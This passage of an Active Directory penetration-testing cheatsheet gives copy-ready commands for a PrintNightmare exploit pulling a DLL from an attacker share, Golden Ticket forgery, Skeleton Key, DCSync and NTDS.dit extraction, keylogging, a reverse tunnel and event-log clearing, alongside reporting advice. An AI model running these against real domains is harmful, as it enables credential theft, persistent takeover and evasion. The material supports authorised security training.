rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

# Exploit
python3 CVE-2021-1675.py DOMAIN/user:password@192.168.1.10 '\\attacker\share\shell.dll'

8. Golden Ticket

Create forged TGT with krbtgt hash.

Tools: Mimikatz, ticketer.py

Why use these tools:

• Mimikatz: Native implementation, works on Windows

• ticketer.py: Linux-based, good for remote operations

• ULTIMATE PERSISTENCE: Valid for 10 years by default

• Can impersonate any user, including non-existent ones

# Mimikatz (requires krbtgt hash and domain SID)
kerberos::golden /user:administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /krbtgt:hash /ptt

# Specify ticket lifetime
kerberos::golden /user:administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /krbtgt:hash /startoffset:-10 /endin:600 /renewmax:10080 /ptt

# Ticketer.py (Impacket)
ticketer.py -nthash hash -domain-sid S-1-5-21-... -domain DOMAIN.LOCAL administrator

# Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass administrator@DC01.DOMAIN.LOCAL

What to do as Testing Analyst:

1. Prerequisites: Need krbtgt hash (via DCSync or NTDS.dit extraction)

2. Obtain domain SID (via whoami /user or PowerView)

3. Create Golden Ticket for any user (including fictional ones)

4. Set realistic ticket lifetime to avoid detection

5. Inject ticket into current session

6. Demonstrate persistent domain access

7. CRITICAL: This is the ultimate persistence mechanism

What to look for:

• ✅ krbtgt hash obtained (prerequisite for Golden Ticket)

• ✅ Domain SID identified correctly

• ✅ Successful ticket creation and injection

• ✅ Access to any resource in the domain

• ✅ Ticket validity period (default 10 years is suspicious)

• ⚠️ Detection: Unusual ticket properties, non-existent users

• ⚠️ Mitigation: Requires krbtgt password reset TWICE

• 🎯 This is BEYOND GAME OVER: Ultimate persistence

• 📝 Document: Golden Ticket creation, access demonstrated

• 🚨 Report as CRITICAL: Persistent domain dominance achieved

• 💡 Recommendation: Rotate krbtgt account password twice (immediate)

9. Silver Ticket

Create forged TGS for specific service.

Tools: Mimikatz, ticketer.py

# Mimikatz (requires service account hash)
kerberos::golden /user:administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /target:target.DOMAIN.LOCAL /service:cifs /rc4:hash /ptt

# Ticketer.py
ticketer.py -nthash hash -domain-sid S-1-5-21-... -domain DOMAIN.LOCAL -spn cifs/target.DOMAIN.LOCAL administrator

10. Shadow Credentials

Tools: pywhisker, whisker

# Add shadow credentials (requires write access to msDS-KeyCredentialLink)
python3 pywhisker.py -d DOMAIN.LOCAL -u user -p password --target targetuser --action add

# Authenticate with certificate
python3 gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass password DOMAIN.LOCAL/targetuser targetuser.ccache

# Use ticket
export KRB5CCNAME=targetuser.ccache

---

Persistence

1. Golden Ticket (Persistence)

Maintains domain admin access indefinitely.

# Create golden ticket (same as privilege escalation section)
kerberos::golden /user:administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /krbtgt:hash /ptt

2. Silver Ticket (Persistence)

Maintains access to specific services.

# Create silver ticket
kerberos::golden /user:administrator /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /target:target.DOMAIN.LOCAL /service:cifs /rc4:hash /ptt

3. Skeleton Key

Backdoor that allows authentication with master password.

Tools: Mimikatz

# Install skeleton key (requires DA)
privilege::debug
misc::skeleton

# Access any account with password "mimikatz"
net use \\target\c$ /user:DOMAIN\anyuser mimikatz

4. DSRM Password Abuse

Directory Services Restore Mode administrator account.

# Get DSRM password hash
token::elevate
lsadump::sam

# Change DSRM logon behaviour
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Use DSRM credentials
sekurlsa::pth /domain:DC01 /user:Administrator /ntlm:hash

5. AdminSDHolder

Abuse AdminSDHolder permissions for persistence.

# Add user to AdminSDHolder ACL
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity user -Rights All

# Trigger SDProp (or wait 60 minutes)
Invoke-SDPropagator -timeoutMinutes 1

6. Malicious SID History

# Add SID of Domain Admins to user
Invoke-Mimikatz -Command '"misc::addsid user S-1-5-21-...-512"'

# Using ntlmrelayx
ntlmrelayx.py -t ldap://192.168.1.10 --escalate-user user

7. ACL Backdoor

# Grant DCSync rights to user
Add-DomainObjectAcl -TargetIdentity "DC=DOMAIN,DC=LOCAL" -PrincipalIdentity user -Rights DCSync

# Grant GenericAll on Domain Admins group
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity user -Rights All

8. Group Membership

# Add user to privileged group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'

# Or less obvious groups
Add-DomainGroupMember -Identity 'Account Operators' -Members 'user'

---

Domain Dominance

1. NTDS.dit Extraction

Extract all domain password hashes.

Methods:

A. VSS Shadow Copy (Local on DC)

Why use this method:

• Uses native Windows Volume Shadow Service

• Works when you have local admin on DC

• Cleanest method with proper cleanup

• No third-party tools required

# Create shadow copy
vssadmin create shadow /for=C:

# Copy NTDS.dit and SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM

# Delete shadow copy
vssadmin delete shadows /shadow={ShadowCopyID}

B. ntdsutil (Local on DC)

Why use this method:

• Official Microsoft utility

• Designed for AD maintenance

• Least likely to trigger alerts

• Creates complete backup

ntdsutil
activate instance ntds
ifm
create full C:\temp\ntds
quit
quit

C. secretsdump.py (Remote)

Why use this method:

• Remote extraction from Linux

• No need to RDP to DC

• Leaves minimal forensic footprint

• Most commonly used by pentesters

# Extract NTDS.dit remotely
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc -outputfile ntds_dump

# Extract with user file
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc-user administrator

# Extract NTLM hashes only
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc-ntlm

D. CrackMapExec

Why use this method:

• Quick and automated

• Part of normal pentesting workflow

• Good for multiple DCs

crackmapexec smb 192.168.1.10 -u administrator -p password --ntds

What to do as Testing Analyst:

1. Prerequisites: Need Domain Admin or DC local admin access

2. Choose extraction method based on access level

3. Remote method (secretsdump) is stealthiest and most practical

4. Ensure you have both NTDS.dit AND SYSTEM hive

5. Exfiltrate files securely (encrypt and compress)

6. Parse hashes offline with secretsdump

7. Organize hashes by privilege level

8. Attempt to crack high-value account passwords

What to look for:

• ✅ Successful NTDS.dit extraction (CRITICAL finding)

• ✅ SYSTEM hive obtained (required for decryption)

• ✅ All domain account hashes extracted

• ✅ krbtgt hash (for Golden Ticket)

• ✅ Domain Admin hashes

• ✅ Service account hashes

• ✅ Password history (if configured)

• ✅ Crackable passwords (weak password policy indicator)

• ⚠️ File size: NTDS.dit can be 100MB to several GB

• ⚠️ Detection: High-privilege file access, unusual DC activity

• 🎯 This equals full domain compromise

• 📝 Document: Extraction method, hash count, cracked passwords

• 🚨 Report as CRITICAL: Complete domain credential compromise

2. Extract Hashes from NTDS.dit

Tools: secretsdump.py, impacket-secretsdump

# Extract from local files
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile hashes

# Parse output
cat hashes.ntds | cut -d':' -f4 > ntlm_hashes.txt

3. Domain Admin Compromise Verification

# Verify domain admin access
Get-DomainGroupMember -Identity "Domain Admins"

# PSExec to DC
psexec.py DOMAIN/administrator:password@DC01.DOMAIN.LOCAL

# DCSync
lsadump::dcsync /domain:DOMAIN.LOCAL /all

4. Forest Compromise

# Enumerate trusts
Get-DomainTrust
Get-ForestTrust

# Map trust keys
Invoke-Mimikatz -Command '"lsadump::trust /patch"'

# Create inter-realm TGT
kerberos::golden /domain:DOMAIN.LOCAL /sid:S-1-5-21-... /sids:S-1-5-21-...-519 /rc4:hash /user:administrator /service:krbtgt /target:PARENT.LOCAL /ticket:trust.kirbi

---

Post-Exploitation

1. Data Exfiltration

# Search for sensitive files
crackmapexec smb 192.168.1.0/24 -u user -p password --spider C$ --pattern *.txt

# Download files
smbclient //192.168.1.10/C$ -U user
get sensitive_file.txt

# PowerShell search
Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.xlsx,*.docx -Recurse -ErrorAction SilentlyContinue

# Download file
Copy-Item -Path "\\target\c$\file.txt" -Destination "C:\temp\file.txt"

2. Pivoting

Tools: sshuttle, chisel, proxychains

# SSHuttle
sshuttle -r user@jumphost 192.168.1.0/24

# Chisel (reverse port forward)
# On attacker:
./chisel server -p 8000 --reverse

# On compromised host:
./chisel client attacker_ip:8000 R:socks

# Configure proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains crackmapexec smb 192.168.1.0/24

3. Credential Harvesting

# Browser credentials
.\SharpWeb.exe all

# Windows Credential Manager
.\SharpDPAPI.exe vaults

# Saved RDP credentials
.\SharpDPAPI.exe rdg

# WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="ProfileName" key=clear

4. Keylogging

# PowerSploit keylogger
Get-Keystrokes -LogPath C:\temp\keys.txt

# Invoke-PSInject for injecting keylogger
Invoke-PSInject -ProcId 1234 -PoshCode {Get-Keystrokes}

---

Cleanup

1. Clear Event Logs

# Clear all event logs
wevtutil el | Foreach-Object {wevtutil cl "$_"}

# Clear specific log
Clear-EventLog -LogName Security
Clear-EventLog -LogName System

# Using wevtutil
wevtutil cl Security
wevtutil cl System

2. Remove Artifacts

# Delete files
Remove-Item -Path C:\temp\* -Recurse -Force

# Remove registry keys
Remove-Item -Path "HKLM:\Software\MyBackdoor" -Recurse

# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath

3. Remove User/Group Modifications

# Remove user from group
Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'user'

# Delete user
Remove-DomainUser -Identity backdoor_user

# Revert ACL changes
Remove-DomainObjectAcl -TargetIdentity "DC=DOMAIN,DC=LOCAL" -PrincipalIdentity user -Rights DCSync

4. Restore Changed Configurations

# If DSRM behaviour was changed
Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior"

# Remove shadow credentials
python3 pywhisker.py -d DOMAIN.LOCAL -u user -p password --target targetuser --action remove

---

Additional Tools Reference

Essential Toolkits

• Impacket: Python toolkit for network protocols

• PowerSploit: PowerShell post-exploitation framework

• Empire/Starkiller: Post-exploitation framework

• Covenant: .NET C2 framework

• Bloodhound: AD relationship mapper

• CrackMapExec: Swiss army knife for pentesting networks

• Rubeus: Kerberos interaction toolkit

• Mimikatz: Credential dumping and manipulation

Useful Resources

• PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings

• HackTricks: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology

• Pentester Academy: Active Directory courses

• CRTP/CRTE: Certified Red Team Professional certifications

• Ired.team: Red team notes and techniques

---

Pentesting Analyst Workflow & Mindset

General Approach for Testing Analysts

1. Methodical Enumeration

• Always enumerate before attacking

• Document everything as you discover it

• Build a complete picture before exploitation

• Understand the environment (size, structure, defences)

2. Progressive Privilege Escalation

• Start with lowest privileges (anonymous, guest)

• Move to authenticated user access

• Escalate to local administrator

• Achieve domain administrator

• Demonstrate domain dominance

3. Evidence Collection

• Screenshot every successful attack

• Save command outputs to files

• Document timestamps of all activities

• Capture proof of access at each stage

• Maintain detailed notes for reporting

4. Risk Management

• Always check lockout policies before password attacks

• Be aware of detection mechanisms (EDR, SIEM, AV)

• Have a rollback plan for persistence mechanisms

• Consider business hours vs. testing hours

• Coordinate with client for destructive tests

5. Thinking Like an Attacker

• What would a real attacker prioritise?

• Which paths provide the most value?

• What can be done stealthily vs. loudly?

• How would you maintain persistence?

• What data is most sensitive?

Critical Questions to Ask Throughout Testing

During Enumeration:

• What sensitive information is unnecessarily exposed?

• Are there null sessions or anonymous binds enabled?

• What's the password policy? (length, complexity, lockout)

• Which accounts have administrative privileges?

• Are there obvious misconfigurations?

During Credential Gathering:

• What accounts are AS-REP roastable or Kerberoastable?

• Are there common passwords in use?

• Can I capture credentials passively (Responder)?

• What's the easiest path to credentials?

• Are service accounts properly secured?

During Lateral Movement:

• Where are privileged users logged in?

• Which systems can I access with current credentials?

• What's the path to Domain Admin?

• Are there jump boxes or admin workstations?

• Can I move laterally without detection?

During Privilege Escalation:

• What ACL misconfigurations exist?

• Are there delegation issues?

• Can I perform DCSync?

• Are there vulnerable GPO settings?

• What's the fastest path to DA?

After Domain Compromise:

• What persistence mechanisms should I demonstrate?

• What sensitive data should I locate?

• How would I pivot to other domains/forests?

• What's the business impact of this compromise?

• What are the most critical remediation steps?

Severity Classification Guide

CRITICAL Findings:

• DCSync capability

• NTDS.dit extraction

• Golden/Silver Ticket creation

• Domain Admin compromise

• krbtgt hash obtained

• Unconstrained delegation on sensitive systems

HIGH Findings:

• Local admin hash reuse across many systems

• Privileged account with weak password

• Clear-text passwords in SYSVOL/shares

• Kerberoastable domain admin accounts

• Path to Domain Admin in <3 hops

• Zerologon or PrintNightmare vulnerability

MEDIUM Findings:

• AS-REP roastable accounts

• Anonymous LDAP/SMB access

• SMB signing not required

• Weak password policy

• Service accounts with excessive privileges

• LLMNR/NBT-NS enabled

LOW Findings:

• Informational disclosures

• Non-privileged account with weak password

• Outdated systems (without direct exploit path)

• Missing security configurations (minor impact)

Documentation Best Practices

For Each Finding, Document:

1. Title: Clear, descriptive name

2. Severity: Based on business impact

3. Description: What the vulnerability is

4. Risk: Why it matters (business context)

5. Steps to Reproduce: Exact commands used

6. Evidence: Screenshots, command outputs

7. Affected Systems: Specific hosts/accounts

8. Remediation: Specific, actionable steps

9. References: CVEs, articles, tools used

Command Documentation Format:

[Timestamp] - [Host/User Context]
$ command_executed
<output>

Result: <what you achieved>

Common Pitfalls to Avoid

1. Rushing without enumeration - Always enumerate thoroughly first

2. Ignoring lockout policies - Check before password attacks

3. Poor documentation - Can't report what you didn't document

4. Missing the obvious - Check basic things (null sessions, default creds)

5. Tunnel vision - Don't fixate on one path, explore alternatives

6. Noisy testing - Be conscious of detection

7. Incomplete privilege verification - Always verify what access you actually have

8. Not tracking credentials - Maintain organised credential database

9. Forgetting to clean up - Remove artifacts and restore changes

10. Inadequate evidence - One screenshot isn't enough for CRITICAL findings

Recommended Testing Sequence

Phase 1: External Reconnaissance (No Credentials)

• Network scanning and port enumeration

• Service identification

• Anonymous/null session testing

• Password spraying (careful!)

• LLMNR/NBT-NS poisoning

Phase 2: Internal Enumeration (Low-Privilege User)

• LDAP enumeration

• SMB share enumeration

• BloodHound collection

• AS-REP roasting

• Kerberoasting

• Search for sensitive data in shares

Phase 3: Privilege Escalation (Moving to Admin)

• Analyse BloodHound paths

• ACL abuse opportunities

• Delegation exploitation

• Local privilege escalation on workstations

• Credential harvesting from memory

Phase 4: Lateral Movement (Spreading Access)

• Pass-the-Hash to other systems

• Identify systems with DA sessions

• Move toward high-value targets

• Compromise administrative workstations/jump boxes

Phase 5: Domain Dominance (Full Compromise)

• DCSync attack

• NTDS.dit extraction

• Golden Ticket creation

• Demonstrate persistent access

• Identify and access crown jewels

Phase 6: Persistence & Impact (Demonstrating Risk)

• Establish multiple persistence mechanisms

• Locate sensitive data

• Document business impact

• Test detection capabilities

• Prepare for remediation discussion

Time Management Tips

• Enumeration: 20-30% of time (don't rush this!)

• Initial Access: 10-20% of time

• Privilege Escalation: 20-30% of time

• Lateral Movement: 10-15% of time

• Domain Dominance: 5-10% of time (quick once you have the path)

• Documentation: 20-25% of time (concurrent and post-testing)

Tools Organisation

Keep organised folders:

/pentest
├── /recon (scan outputs, enumeration data)
├── /creds (hashes, passwords, tickets)
├── /loot (sensitive files found)
├── /screenshots (evidence)
├── /tools (scripts, payloads)
└── /reports (notes, findings)

Maintain a credentials file:

Username:Password:Hash:Source:Privileges:Tested_On

Red Flags That Indicate Good Security

• LAPS implemented (no hash reuse)

• Credential Guard enabled

• Strong password policy enforced

• Minimal privileged accounts

• Proper network segmentation

• SMB signing required

• LDAP signing required

• No delegation issues

• Regular patch management

• EDR with active monitoring

• Quick detection and response

When You're Stuck

1. Re-enumerate: You probably missed something

2. Check BloodHound: Visualise paths you might have missed

3. Review credentials: Try all creds on all systems

4. Look for sensitive files: Often contains credentials

5. Social engineering: Sometimes technical won't work

6. Check for common CVEs: PrintNightmare, Zerologon, etc.

7. Ask for hints: Don't waste time if truly stuck (in training)

8. Try different tools: One might work where another failed

9. Review logs: Sometimes errors contain useful info

10. Take a break: Fresh perspective helps

---

Operational Security Tips

1. Be stealthy: Avoid detection by using native Windows tools when possible

2. Rate limiting: Don't spray too fast, respect lockout policies

3. Time awareness: Be conscious of monitoring hours and work schedules

4. Log awareness: Know what actions generate logs

5. Blend in: Use legitimate tools and techniques that admins might use

6. OpSec mistakes: Avoid reusing infrastructure, leaving obvious artifacts

7. Communication: Use encrypted channels for C2

8. Documentation: Keep detailed notes of all actions for reporting

---

Common Mistakes to Avoid

1. Triggering account lockouts with password spraying

2. Running loud scans that alert SOC

3. Not validating credentials before using them

4. Forgetting to clean up artifacts

5. Using default tool configurations

6. Not understanding the environment before attacking

7. Ignoring EDR/AV solutions

8. Poor OPSEC with attacker infrastructure

9. Not having a backup plan

10. Inadequate documentation for reporting

---

Report Writing Checklist

• [ ] Executive Summary

• [ ] Scope and Methodology

• [ ] Findings (Critical to Low)

• [ ] Evidence (Screenshots, logs, commands)

• [ ] Remediation Recommendations

• [ ] Attack Path Diagram

• [ ] Timeline of Actions

• [ ] Affected Systems List

• [ ] Appendices (Technical Details)

---

Quick Reference Guide for Analysts

First 10 Commands to Run

# 1. Find Domain Controllers
nmap -p 88,389,445 192.168.1.0/24

# 2. DNS enumeration
nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL

# 3. Anonymous SMB enumeration
crackmapexec smb 192.168.1.10 -u '' -p '' --shares

# 4. Check for null sessions
rpcclient -U "" -N 192.168.1.10 -c "enumdomusers"

# 5. Anonymous LDAP bind test
ldapsearch -x -h 192.168.1.10 -b "DC=DOMAIN,DC=LOCAL" "(objectClass=user)"

# 6. Get password policy
crackmapexec smb 192.168.1.10 -u '' -p '' --pass-pol

# 7. Enumerate users (if you have creds)
crackmapexec smb 192.168.1.10 -u user -p password --users

# 8. Run BloodHound collector
bloodhound-python -d DOMAIN.LOCAL -u user -p password -ns 192.168.1.10 -c all

# 9. AS-REP Roasting
GetNPUsers.py DOMAIN.LOCAL/ -usersfile users.txt -dc-ip 192.168.1.10

# 10. Kerberoasting
GetUserSPNs.py DOMAIN.LOCAL/user:password -dc-ip 192.168.1.10 -request

Critical Checks Checklist

Unauthenticated Checks:

• [ ] Anonymous LDAP bind

• [ ] Null SMB sessions

• [ ] Anonymous RPC access

• [ ] DNS zone transfer

• [ ] SMB signing status

• [ ] LLMNR/NBT-NS responses

Authenticated User Checks:

• [ ] AS-REP roastable accounts

• [ ] Kerberoastable accounts

• [ ] Readable shares (including SYSVOL)

• [ ] BloodHound path to DA

• [ ] ACL misconfigurations

• [ ] GPP passwords

• [ ] Service accounts in privileged groups

Privileged Access Checks:

• [ ] DCSync capability

• [ ] NTDS.dit extraction

• [ ] Delegation configurations

• [ ] AdminSDHolder changes

• [ ] Golden Ticket creation

• [ ] Domain trust enumeration

Most Effective Attack Paths (By Frequency)

1. Kerberoasting → Weak Password → Privilege Escalation (40% success rate)

2. Password Spraying → Valid User → Kerberoasting (30% success rate)

3. Responder → NTLM Hash → Pass-the-Hash → DA (25% success rate)

4. BloodHound Path → ACL Abuse → DCSync (20% success rate)

5. AS-REP Roasting → Weak Password → Local Admin (15% success rate)

One-Liner Commands for Common Tasks

# Quick user enumeration
crackmapexec smb DC_IP -u '' -p '' --users | grep -i 'admin\|svc\|sql'

# Find SMB shares across network
crackmapexec smb 192.168.1.0/24 -u user -p password --shares --filter-shares READ WRITE

# Test credentials across network
crackmapexec smb 192.168.1.0/24 -u user -p password --continue-on-success

# Find admin access
crackmapexec smb 192.168.1.0/24 -u user -H hash --local-auth | grep "Pwn3d!"

# Extract tickets from all sessions
.\Rubeus.exe dump /nowrap

# Quick password spray (safe - 1 password)
kerbrute passwordspray -d DOMAIN.LOCAL users.txt 'Welcome2024!'

# Get BloodHound data quickly
bloodhound-python -d DOMAIN.LOCAL -u user -p pass -ns DC_IP -c all --zip

# DCSync single user
secretsdump.py 'DOMAIN/user:password@DC_IP' -just-dc-user administrator

# Pass-the-hash to multiple hosts
crackmapexec smb targets.txt -u admin -H HASH -x "whoami"

Typical Timeline for AD Assessment

Day 1 (Enumeration & Initial Access):

• Hours 0-2: Network scanning, service enumeration

• Hours 2-4: Anonymous/null session testing

• Hours 4-6: Password spraying (if applicable)

• Hours 6-8: Responder running, initial credential gathering

Day 2 (Privilege Escalation):

• Hours 0-2: BloodHound analysis, attack path identification

• Hours 2-4: Kerberoasting, AS-REP roasting

• Hours 4-6: Hash cracking, credential validation

• Hours 6-8: Lateral movement testing

Day 3 (Domain Dominance):

• Hours 0-2: ACL abuse or delegation exploitation

• Hours 2-4: DCSync or NTDS.dit extraction

• Hours 4-6: Golden Ticket, persistence demonstration

• Hours 6-8: Sensitive data identification

Day 4 (Documentation):

• Hours 0-4: Screenshot organisation, evidence compilation

• Hours 4-8: Report writing, remediation recommendations

Tool Selection Decision Tree

Need to enumerate users?

• No creds → rpcclient null session, LDAP anonymous

• Have creds → PowerView, BloodHound

Need credentials?

• From network → Responder, mitm6

• From accounts → Kerberoasting, AS-REP roasting, password spray

• From memory → Mimikatz, pypykatz

Need lateral movement?

• Have hash → CrackMapExec, psexec.py

• Have ticket → Rubeus, Mimikatz

• Have password → WinRM, RDP, SMB

Need privilege escalation?

• Find path → BloodHound

• Exploit path → PowerView (ACLs), Rubeus (delegation)

Need domain dominance?

• Extract hashes → secretsdump.py, Mimikatz

• Persistence → Golden Ticket, Silver Ticket

Common Error Messages & Solutions

"STATUS_PASSWORD_MUST_CHANGE"

• Solution: Password expired, might be easy to guess

"STATUS_ACCOUNT_LOCKED_OUT"

• Solution: Stop password spraying! Wait for unlock or adjust attempts

"KDC_ERR_PREAUTH_FAILED"

• Solution: Wrong password/hash, or account locked

"Access Denied"

• Solution: Need higher privileges, find another path

"STATUS_LOGON_FAILURE"

• Solution: Invalid credentials or wrong domain

Responder not capturing hashes

• Solution: LLMNR/NBT-NS might be disabled, or no traffic

BloodHound shows no path to DA

• Solution: Enumerate more, might need additional privileges first

Final Pro Tips

1. Always enumerate twice - Once before exploitation, once after new creds

2. BloodHound is your best friend - Use it constantly

3. Document as you go - Screenshots and notes in real-time

4. One credential can unlock everything - Test every cred everywhere

5. Service accounts are gold - They often have weak passwords and high privileges

6. Check descriptions - Users put passwords in description fields

7. Time your attacks - Business hours for Responder, off-hours for scanning

8. Clean up your artifacts - Professional pentesters leave no trace

9. Multiple paths to DA - Find them all for comprehensive reporting

10. Focus on impact - Business impact matters more than technical complexity

---

Note: This cheatsheet is for training only. Always ensure proper authorisation before testing any systems.